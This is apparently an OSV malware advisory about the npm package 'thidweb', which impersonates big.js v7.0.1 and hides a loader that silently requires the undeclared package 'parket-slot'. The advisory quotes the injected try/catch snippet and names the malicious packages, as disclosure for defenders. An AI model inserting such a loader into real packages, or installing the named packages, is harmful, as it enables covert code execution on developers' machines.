OSV ID
MAL-2026-6343
Ecosystem
npm
Summary
Package is published as thidweb but its README, source comments, repo URL, and author metadata all identify it as big.js v7.0.1 by Mike McLaughlin (README.md line 1 # big.js ; big.js header big.js v7.0.1 ; package.json repository url https://github.com/MikeMcl/big.js.git ). The source is a verbatim copy of upstream big.js with a covert loader injected mid-file at big.js:605-609: try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { } . The same block is present in big.mjs. parket-slot is not declared in package.json dependencies; the only declared dependency is log-taker@^0.0.9 , which upstream big.js does not require (upstream is dependency-free). Any developer who installs thidweb (mistaking it for big.js) and imports it executes whatever code parket-slot ships, with errors silently swallowed. The combination of impersonation, undeclared runtime require, error-suppressing try/catch, and an unrelated declared dependency is a multi-stage installer-side code-execution attack.
Source: amazon-inspector (80721058923b3e5963a6ee170007b8b4131ae5093481456ca10e63f52963987d)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.